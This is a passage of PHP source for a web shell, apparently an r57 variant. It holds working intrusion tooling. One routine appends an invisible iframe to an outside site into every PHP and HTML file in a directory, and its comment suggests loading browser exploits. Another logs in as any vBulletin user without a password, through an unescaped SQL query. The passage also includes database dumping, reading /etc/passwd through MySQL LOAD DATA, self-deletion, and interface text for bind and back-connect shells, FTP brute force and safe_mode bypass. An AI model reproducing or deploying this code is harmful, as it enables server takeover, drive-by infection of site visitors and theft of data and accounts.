  578. <table border=0><tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr>
  579. <tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://omegakd.net" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr>
  580. <tr><td><input type=submit value="Inject Code"></td></tr></table></form>
  581. <?php
  582. if ($_GET['masssploit'] == 'goahead') {
  583.         if (is_dir($_GET['pathtomass'])) {
  584.                 $lolinject = $_GET['injectthis'];
  585.                 foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
  586.                         $fp=fopen($injectj00,"a+");
  587.                         if (fputs($fp,$lolinject)){
  588.                                 echo $injectj00.' was injected<br>';
  589.                         } else {
  590.                                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  591.                         }
  592.                 }
  593.                 foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
  594.                         $fp=fopen($injectj00,"a+");
  595.                         if (fputs($fp,$lolinject)){
  596.                                 echo $injectj00.' was injected<br>';
  597.                         } else {
  598.                                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  599.                         }
  600.                 }
  601.                 foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
  602.                         $fp=fopen($injectj00,"a+");
  603.                         if (fputs($fp,$lolinject)){
  604.                                 echo $injectj00.' was injected<br>';
  605.                         } else {
  606.                                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  607.                         }
  608.                 }
  609.         } else {
  610.                 echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
  611.         }
  612. }
  613. ?>
  614. </body></html>
  615. <?
  616. }
  617. if($_GET['act']=="fakelogin"){
  618. echo '<form name=form method=POST><b>Username : </b><input name="user" size="45" value="" type="text"><br/>Path global.php : </b><input name="global" size="45" value="./global.php" type="text"><br/>
  619. <b>Path functions_login.php : </b><input name="login" size="45" value="./includes/functions_login.php" type="text"><br/><input name="submit" size="2" value="Login" type="submit"></form>';
  620. if ($_POST['submit']){
  621. define('THIS_SCRIPT', 'login');
  622. echo $_POST['global'];
  623. require_once($_POST['global']);
  624. require_once($_POST['login']);
  625. $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_POST['user'] . "'");
  626. if (!$vbulletin->userinfo['userid']) echo "Invalid username!";
  627. else
  628. {
  629. echo $_POST['login'];
  630. vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
  631. vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
  632. exec_unstrike_user($_POST['user']);
  633. process_new_login('cplogin', TRUE, TRUE);
  634. do_login_redirect();
  635. }}}
  636. echo "</table><br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div></body></html>";
  637. exit();
  638. }
  639. //Tools Hacking End
  640.  
  641. $language='eng';
  642. $auth = 0;
  643. $userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
  644. $downloaders = array('wget','fetch','lynx','links','curl','get');
  645. @ini_set('max_execution_time',0);
  646. @ini_set('output_buffering',0);
  647. define("starttime",getmicrotime());
  648. $safe_mode = @ini_get('safe_mode');
  649. $version = 'TheSunOfVN Edition';
  650. $footer = '<div align=center><font face=Verdana size=-2><b>o---[  Marion001 R57 Shell ]---o</b></font></div>';
  651. if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
  652. if(@function_exists('ini_set'))
  653.  {
  654.  @ini_set('max_execution_time',0);
  655.  @ini_set('output_buffering',0);
  656.  }
  657. else
  658.  {
  659.  @ini_alter('max_execution_time',0);
  660.  @ini_alter('output_buffering',0);
  661.  }
  662. if(version_compare(phpversion(), '4.1.0') == -1)
  663.  {
  664.  $_POST   = &$HTTP_POST_VARS;
  665.  $_GET    = &$HTTP_GET_VARS;
  666.  $_SERVER = &$HTTP_SERVER_VARS;
  667.  $_COOKIE = &$HTTP_COOKIE_VARS;
  668.  }
  669.  {
  670.  foreach ($_POST as $k=>$v)
  671.   {
  672.   $_POST[$k] = stripslashes($v);
  673.   }
  674.  foreach ($_COOKIE as $k=>$v)
  675.   {
  676.   $_COOKIE[$k] = stripslashes($v);
  677.   }
  678.  }
  679. function compress(&$filename,&$filedump,$compress)
  680.  {
  681.     global $content_encoding;
  682.     global $mime_type;
  683.     if ($compress == 'bzip' && @function_exists('bzcompress'))
  684.      {
  685.         $filename  .= '.bz2';
  686.         $mime_type = 'application/x-bzip2';
  687.         $filedump = bzcompress($filedump);
  688.      }
  689.      else if ($compress == 'gzip' && @function_exists('gzencode'))
  690.      {
  691.         $filename  .= '.gz';
  692.         $content_encoding = 'x-gzip';
  693.         $mime_type = 'application/x-gzip';
  694.         $filedump = gzencode($filedump);
  695.      }
  696.      else if ($compress == 'zip' && @function_exists('gzcompress'))
  697.      {
  698.         $filename .= '.zip';
  699.         $mime_type = 'application/zip';
  700.         $zipfile = new zipfile();
  701.         $zipfile -> addFile($filedump, substr($filename, 0, -4));
  702.         $filedump = $zipfile -> file();
  703.      }
  704.      else
  705.      {
  706.         $mime_type = 'application/octet-stream';
  707.      }
  708.  }
  709. class my_sql
  710.  {
  711.  var $host = 'localhost';
  712.  var $port = '';
  713.  var $user = '';
  714.  var $pass = '';
  715.  var $base = '';
  716.  var $db   = '';
  717.  var $connection;
  718.  var $res;
  719.  var $error;
  720.  var $rows;
  721.  var $columns;
  722.  var $num_rows;
  723.  var $num_fields;
  724.  var $dump;
  725. function connect()
  726.   {
  727.         switch($this->db)
  728.      {
  729.          case 'MySQL':
  730.           if(empty($this->port)) { $this->port = '3306'; }
  731.           if(!function_exists('mysql_connect')) return 0;
  732.           $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
  733.           if(is_resource($this->connection)) return 1;
  734.          break;
  735.      case 'MSSQL':
  736.       if(empty($this->port)) { $this->port = '1433'; }
  737.           if(!function_exists('mssql_connect')) return 0;
  738.           $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
  739.       if($this->connection) return 1;
  740.      break;
  741.      case 'PostgreSQL':
  742.       if(empty($this->port)) { $this->port = '5432'; }
  743.       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
  744.       if(!function_exists('pg_connect')) return 0;
  745.       $this->connection = @pg_connect($str);
  746.       if(is_resource($this->connection)) return 1;
  747.      break;
  748.      case 'Oracle':
  749.       if(!function_exists('ocilogon')) return 0;
  750.       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
  751.       if(is_resource($this->connection)) return 1;
  752.      break;
  753.      }
  754.     return 0;
  755.   }
  756.  
  757.  function select_db()
  758.   {
  759.    switch($this->db)
  760.     {
  761.         case 'MySQL':
  762.          if(@mysql_select_db($this->base,$this->connection)) return 1;
  763.     break;
  764.     case 'MSSQL':
  765.          if(@mssql_select_db($this->base,$this->connection)) return 1;
  766.     break;
  767.     case 'PostgreSQL':
  768.      return 1;
  769.     break;
  770.     case 'Oracle':
  771.      return 1;
  772.     break;
  773.     }
  774.    return 0;
  775.   }
  776.  
  777.  function query($query)
  778.   {
  779.    $this->res=$this->error='';
  780.    switch($this->db)
  781.     {
  782.         case 'MySQL':
  783.      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  784.       {
  785.       $this->error = @mysql_error($this->connection);
  786.       return 0;
  787.       }
  788.      else if(is_resource($this->res)) { return 1; }
  789.      return 2;
  790.         break;
  791.     case 'MSSQL':
  792.      if(false===($this->res=@mssql_query($query,$this->connection)))
  793.       {
  794.       $this->error = 'Query error';
  795.       return 0;
  796.       }
  797.       else if(@mssql_num_rows($this->res) > 0) { return 1; }
  798.      return 2;
  799.     break;
  800.     case 'PostgreSQL':
  801.      if(false===($this->res=@pg_query($this->connection,$query)))
  802.       {
  803.       $this->error = @pg_last_error($this->connection);
  804.       return 0;
  805.       }
  806.       else if(@pg_num_rows($this->res) > 0) { return 1; }
  807.      return 2;
  808.     break;
  809.     case 'Oracle':
  810.      if(false===($this->res=@ociparse($this->connection,$query)))
  811.       {
  812.       $this->error = 'Query parse error';
  813.       }
  814.      else
  815.       {
  816.       if(@ociexecute($this->res))
  817.        {
  818.        if(@ocirowcount($this->res) != 0) return 2;
  819.        return 1;
  820.        }
  821.       $error = @ocierror();
  822.       $this->error=$error['message'];
  823.       }
  824.     break;
  825.     }
  826.   return 0;
  827.   }
  828.  function get_result()
  829.   {
  830.    $this->rows=array();
  831.    $this->columns=array();
  832.    $this->num_rows=$this->num_fields=0;
  833.    switch($this->db)
  834.     {
  835.         case 'MySQL':
  836.          $this->num_rows=@mysql_num_rows($this->res);
  837.          $this->num_fields=@mysql_num_fields($this->res);
  838.          while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
  839.          @mysql_free_result($this->res);
  840.          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  841.     break;
  842.     case 'MSSQL':
  843.          $this->num_rows=@mssql_num_rows($this->res);
  844.          $this->num_fields=@mssql_num_fields($this->res);
  845.          while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
  846.          @mssql_free_result($this->res);
  847.          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
  848.     break;
  849.     case 'PostgreSQL':
  850.          $this->num_rows=@pg_num_rows($this->res);
  851.          $this->num_fields=@pg_num_fields($this->res);
  852.          while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  853.          @pg_free_result($this->res);
  854.          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  855.     break;
  856.     case 'Oracle':
  857.      $this->num_fields=@ocinumcols($this->res);
  858.      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
  859.      @ocifreestatement($this->res);
  860.      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  861.     break;
  862.     }
  863.    return 0;
  864.   }
  865.  function dump($table)
  866.   {
  867.    if(empty($table)) return 0;
  868.    $this->dump=array();
  869.    $this->dump[0] = '##';
  870.    $this->dump[1] = '## --------------------------------------- ';
  871.    $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
  872.    $this->dump[3] = '## Database: '.$this->base;
  873.    $this->dump[4] = '##    Table: '.$table;
  874.    $this->dump[5] = '## --------------------------------------- ';
  875.    switch($this->db)
  876.     {
  877.         case 'MySQL':
  878.          $this->dump[0] = '## MySQL dump';
  879.          if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
  880.          if(!$this->get_result()) return 0;
  881.          $this->dump[] = $this->rows[0]['Create Table'];
  882.      $this->dump[] = '## --------------------------------------- ';
  883.          if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
  884.          if(!$this->get_result()) return 0;
  885.          for($i=0;$i<$this->num_rows;$i++)
  886.           {
  887.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
  888.           $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  889.           }
  890.     break;
  891.     case 'MSSQL':
  892.      $this->dump[0] = '## MSSQL dump';
  893.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  894.          if(!$this->get_result()) return 0;
  895.          for($i=0;$i<$this->num_rows;$i++)
  896.           {
  897.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  898.           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  899.           }
  900.     break;
  901.     case 'PostgreSQL':
  902.      $this->dump[0] = '## PostgreSQL dump';
  903.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  904.          if(!$this->get_result()) return 0;
  905.          for($i=0;$i<$this->num_rows;$i++)
  906.           {
  907.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  908.           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  909.           }
  910.     break;
  911.     case 'Oracle':
  912.       $this->dump[0] = '## ORACLE dump';
  913.       $this->dump[]  = '## under construction';
  914.     break;
  915.     default:
  916.      return 0;
  917.     break;
  918.     }
  919.    return 1;
  920.   }
  921.  function close()
  922.   {
  923.    switch($this->db)
  924.     {
  925.         case 'MySQL':
  926.          @mysql_close($this->connection);
  927.     break;
  928.     case 'MSSQL':
  929.      @mssql_close($this->connection);
  930.     break;
  931.     case 'PostgreSQL':
  932.      @pg_close($this->connection);
  933.     break;
  934.     case 'Oracle':
  935.      @oci_close($this->connection);
  936.     break;
  937.     }
  938.   }
  939.  function affected_rows()
  940.   {
  941.    switch($this->db)
  942.     {
  943.         case 'MySQL':
  944.          return @mysql_affected_rows($this->res);
  945.     break;
  946.     case 'MSSQL':
  947.      return @mssql_affected_rows($this->res);
  948.     break;
  949.     case 'PostgreSQL':
  950.      return @pg_affected_rows($this->res);
  951.     break;
  952.     case 'Oracle':
  953.      return @ocirowcount($this->res);
  954.     break;
  955.     default:
  956.      return 0;
  957.     break;
  958.     }
  959.   }
  960.  }
  961. if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
  962.  {
  963.   if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
  964.   else
  965.    {
  966.     @ob_clean();
  967.     $filename = @basename($_POST['d_name']);
  968.     $filedump = @fread($file,@filesize($_POST['d_name']));
  969.     fclose($file);
  970.     $content_encoding=$mime_type='';
  971.     compress($filename,$filedump,$_POST['compress']);
  972.     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
  973.     header("Content-type: ".$mime_type);
  974.     header("Content-disposition: attachment; filename=\"".$filename."\";");
  975.     echo $filedump;
  976.     exit();
  977.    }
  978.  }
  979. if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  980.  
  981.  
  982. if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
  983.  {
  984.  echo $head;
  985.  $sql = new my_sql();
  986.  $sql->db   = $_POST['db'];
  987.  $sql->host = $_POST['db_server'];
  988.  $sql->port = $_POST['db_port'];
  989.  $sql->user = $_POST['mysql_l'];
  990.  $sql->pass = $_POST['mysql_p'];
  991.  $sql->base = $_POST['mysql_db'];
  992.  $querys = @explode(';',$_POST['db_query']);
  993.  echo '<body bgcolor=Black>';
  994.  if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=#2aff00><b>Can't connect to SQL server</b></font></div>";
  995.   else
  996.    {
  997.    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=#2aff00><b>Can't select database</b></font></div>";
  998.    else
  999.     {
  1000.     foreach($querys as $num=>$query)
  1001.      {
  1002.       if(strlen($query)>5)
  1003.       {
  1004.       echo "<font face=Verdana size=-2 color=#2aff00><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
  1005.       switch($sql->query($query))
  1006.        {
  1007.        case '0':
  1008.        echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
  1009.        break;
  1010.        case '1':
  1011.        if($sql->get_result())
  1012.         {
  1013.         echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
  1014.         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
  1015.         $keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
  1016.         echo "<tr><td class=main bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
  1017.         for($i=0;$i<$sql->num_rows;$i++)
  1018.          {
  1019.          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
  1020.          $values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
  1021.          echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
  1022.          }
  1023.         echo "</table>";
  1024.         }
  1025.      break;
  1026.        case '2':
  1027.        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
  1028.        echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
  1029.        break;
  1030.        }
  1031.       }
  1032.      }
  1033.     }
  1034.     echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
  1035.     echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
  1036.     echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
  1037.     $query_db = mysql_query("SHOW DATABASES;");
  1038.     while ($query_db_row = mysql_fetch_array($query_db))
  1039.     {
  1040.         echo $query_db_row[0]."\n";
  1041.     }
  1042.     echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
  1043.     if (($_POST['mysql_db']) && $sql->select_db())
  1044.     {
  1045.      $query_tables = mysql_query("SHOW TABLES;");
  1046.      while ($query_tables_row = mysql_fetch_array($query_tables))
  1047.      {
  1048.         echo $query_tables_row[0]."\n";
  1049.      }
  1050.     }
  1051.     echo "</textarea></div></td></tr></table></div>";
  1052.    }
  1053.  echo "<br><form name=form method=POST>";
  1054.  echo in('hidden','db',0,$_POST['db']);
  1055.  echo in('hidden','db_server',0,$_POST['db_server']);
  1056.  echo in('hidden','db_port',0,$_POST['db_port']);
  1057.  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
  1058.  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
  1059.  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
  1060.  echo in('hidden','cmd',0,'db_query');
  1061.  echo "<div align=center>";
  1062.  echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
  1063.  echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
  1064.  echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \"><br /><br />";
  1065.  echo "<b>File content</b><br><br>";
  1066.  echo "<textarea cols=121 rows=15 name=showloadfile>";
  1067.  @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  1068.  @mysql_query("CREATE TABLE `thesunofvn` ( `file` LONGBLOB NOT NULL )");
  1069.  @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE thesunofvn FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
  1070.  $r = @mysql_query("SELECT * FROM thesunofvn");
  1071.  while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
  1072.  @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  1073.  echo "</textarea></div>";
  1074.  echo "</form>";
  1075.  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  1076.  }
  1077. if(isset($_GET['delete']))
  1078.  {
  1079.    @unlink(__FILE__);
  1080.  }
  1081. if(isset($_GET['tmp']))
  1082.  {
  1083.    @unlink("/tmp/bdpl");
  1084.    @unlink("/tmp/back");
  1085.    @unlink("/tmp/bd");
  1086.    @unlink("/tmp/bd.c");
  1087.    @unlink("/tmp/dp");
  1088.    @unlink("/tmp/dpc");
  1089.    @unlink("/tmp/dpc.c");
  1090.  }
  1091. if(isset($_GET['phpini']))
  1092. {
  1093. echo $head;
  1094. function U_value($value)
  1095.  {
  1096.  if ($value == '') return '<i>no value</i>';
  1097.  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  1098.  if ($value === null) return 'NULL';
  1099.  if (@is_object($value)) $value = (array) $value;
  1100.  if (@is_array($value))
  1101.  {
  1102.  @ob_start();
  1103.  print_r($value);
  1104.  $value = @ob_get_contents();
  1105.  }
  1106.  return U_wordwrap((string) $value);
  1107.  }
  1108. function U_wordwrap($str)
  1109.  {
  1110.  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  1111.  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  1112.  }
  1113. if (@function_exists('ini_get_all'))
  1114.  {
  1115.  $r = '';
  1116.  echo '<table width=100%>', '<tr><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Master Value</b></div></font></td></tr>';
  1117.  foreach (@ini_get_all() as $key=>$value)
  1118.   {
  1119.   $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  1120.   }
  1121.  echo $r;
  1122.  echo '</table>';
  1123.  }
  1124. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1125. die();
  1126. }
  1127. if(isset($_GET['cpu']))
  1128.  {
  1129.    echo $head;
  1130.    echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#2aff00><b>CPU</b></font></div></td></tr></table><table width=100%>';
  1131.    $cpuf = @file("cpuinfo");
  1132.    if($cpuf)
  1133.     {
  1134.       $c = @sizeof($cpuf);
  1135.       for($i=0;$i<$c;$i++)
  1136.         {
  1137.           $info = @explode(":",$cpuf[$i]);
  1138.           if($info[1]==""){ $info[1]="---"; }
  1139.           $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1140.         }
  1141.       echo $r;
  1142.     }
  1143.    else
  1144.     {
  1145.       echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
  1146.     }
  1147.    echo '</table>';
  1148.    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1149.    die();
  1150.  }
  1151. if(isset($_GET['mem']))
  1152.  {
  1153.    echo $head;
  1154.    echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#2aff00><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
  1155.    $memf = @file("meminfo");
  1156.    if($memf)
  1157.     {
  1158.       $c = sizeof($memf);
  1159.       for($i=0;$i<$c;$i++)
  1160.         {
  1161.           $info = explode(":",$memf[$i]);
  1162.           if($info[1]==""){ $info[1]="---"; }
  1163.           $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1164.         }
  1165.       echo $r;
  1166.     }
  1167.    else
  1168.     {
  1169.       echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
  1170.     }
  1171.    echo '</table>';
  1172.    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1173.    die();
  1174.  }
  1175. $lang=array(
  1176. /* --------------------------------------------------------------- */
  1177. 'eng_text1' =>'Executed command',
  1178. 'eng_text2' =>'Execute command on server',
  1179. 'eng_text3' =>'Run command',
  1180. 'eng_text4' =>'Work directory',
  1181. 'eng_text5' =>'Upload files on server',
  1182. 'eng_text6' =>'Local file',
  1183. 'eng_text7' =>'Aliases',
  1184. 'eng_text8' =>'Select alias',
  1185. 'eng_butt1' =>'Execute',
  1186. 'eng_butt2' =>'Upload',
  1187. 'eng_text9' =>'Bind port to /bin/bash',
  1188. 'eng_text10'=>'Port',
  1189. 'eng_text11'=>'Password for access',
  1190. 'eng_butt3' =>'Bind',
  1191. 'eng_text12'=>'back-connect',
  1192. 'eng_text13'=>'IP',
  1193. 'eng_text14'=>'Port',
  1194. 'eng_butt4' =>'Connect',
  1195. 'eng_text15'=>'Upload files from remote server',
  1196. 'eng_text16'=>'With',
  1197. 'eng_text17'=>'Remote file',
  1198. 'eng_text18'=>'Local file',
  1199. 'eng_text20'=>'Use',
  1200. 'eng_text21'=>' New name',
  1201. 'eng_text23'=>'Local port',
  1202. 'eng_text24'=>'Remote host',
  1203. 'eng_text25'=>'Remote port',
  1204. 'eng_text26'=>'Use',
  1205. 'eng_butt5' =>'Run',
  1206. 'eng_text28'=>'Work in safe_mode',
  1207. 'eng_text29'=>'...::: ACCESS DENIED :::...',
  1208. 'eng_butt6' =>'Change',
  1209. 'eng_text30'=>'Cat file',
  1210. 'eng_butt7' =>'Show',
  1211. 'eng_text31'=>'File not found',
  1212. 'eng_text32'=>'Eval PHP code',
  1213. 'eng_text33'=>'Test bypass open_basedir with cURL functions',
  1214. 'eng_text300'=>'read file from vul curl()',
  1215. 'eng_butt8' =>'Test',
  1216. 'eng_text34'=>'',
  1217. 'eng_text35'=>'Test bypass with load file in mysql',
  1218. 'eng_text36'=>'Db . Table',
  1219. 'eng_text37'=>'Login',
  1220. 'eng_text38'=>'Password',
  1221. 'eng_text39'=>'Database',
  1222. 'eng_text40'=>'Dump database table',
  1223. 'eng_butt9' =>'Dump',
  1224. 'eng_text41'=>'Save dump in file',
  1225. 'eng_text42'=>'Edit files',
  1226. 'eng_text43'=>'File for edit',
  1227. 'eng_butt10'=>'Save',
  1228. 'eng_text44'=>'Can\'t edit file! Only read access!',
  1229. 'eng_text45'=>'File saved',
  1230. 'eng_text46'=>'Show phpinfo()',
  1231. 'eng_text47'=>'Show variables from php.ini',
  1232. 'eng_text48'=>'Delete temp files',
  1233. 'eng_butt11'=>'Edit file',
  1234. 'eng_text49'=>'Delete script from server',
  1235. 'eng_text50'=>'View cpu info',
  1236. 'eng_text51'=>'View memory info',
  1237. 'eng_text52'=>'Find text',
  1238. 'eng_text53'=>'In dirs',
  1239. 'eng_text54'=>'Find text in files',
  1240. 'eng_butt12'=>'Find',
  1241. 'eng_text55'=>'Only in files',
  1242. 'eng_text56'=>'Nothing :(',
  1243. 'eng_text57'=>'Create/Delete File/Dir',
  1244. 'eng_text58'=>'name',
  1245. 'eng_text59'=>'file',
  1246. 'eng_text60'=>'dir',
  1247. 'eng_butt13'=>'Create/Delete',
  1248. 'eng_text61'=>'File created',
  1249. 'eng_text62'=>'Dir created',
  1250. 'eng_text63'=>'File deleted',
  1251. 'eng_text64'=>'Dir deleted',
  1252. 'eng_text65'=>'Create',
  1253. 'eng_text66'=>'Delete',
  1254. 'eng_text67'=>'Chown/Chgrp/Chmod',
  1255. 'eng_text68'=>'Command',
  1256. 'eng_text69'=>'param1',
  1257. 'eng_text70'=>'param2',
  1258. 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
  1259. 'eng_text72'=>'Text for find',
  1260. 'eng_text73'=>'Find in folder',
  1261. 'eng_text74'=>'Find in files',
  1262. 'eng_text75'=>'* you can use regexp',
  1263. 'eng_text76'=>'',
  1264. 'eng_text80'=>'Type',
  1265. 'eng_text81'=>'Net',
  1266. 'eng_text82'=>'Databases',
  1267. 'eng_text83'=>'Run SQL query',
  1268. 'eng_text84'=>'SQL query',
  1269. 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
  1270. 'eng_text86'=>'Download files from server',
  1271. 'eng_butt14'=>'Download',
  1272. 'eng_text87'=>'Download files from remote ftp-server',
  1273. 'eng_text88'=>'FTP-server:port',
  1274. 'eng_text89'=>'File on ftp',
  1275. 'eng_text90'=>'Transfer mode',
  1276. 'eng_text91'=>'Archivation',
  1277. 'eng_text92'=>'without archivation',
  1278. 'eng_text93'=>'FTP',
  1279. 'eng_text94'=>'FTP-bruteforce',
  1280. 'eng_text95'=>'Users list',
  1281. 'eng_text96'=>'Can\'t get users list',
  1282. 'eng_text97'=>'checked: ',
  1283. 'eng_text98'=>'success: ',
  1284. 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
  1285. 'eng_text100'=>'Send file to remote ftp server',
  1286. 'eng_text101'=>'Use reverse (user -> resu) login for password',
  1287. 'eng_text109'=>'Hide',
  1288. 'eng_text110'=>'Show',
  1289. 'eng_text111'=>'SQL-Server : Port',
  1290.  
  1291. 'eng_text115'=>'',
  1292. 'eng_text116'=>'Copy from',
  1293. 'eng_text117'=>'to',
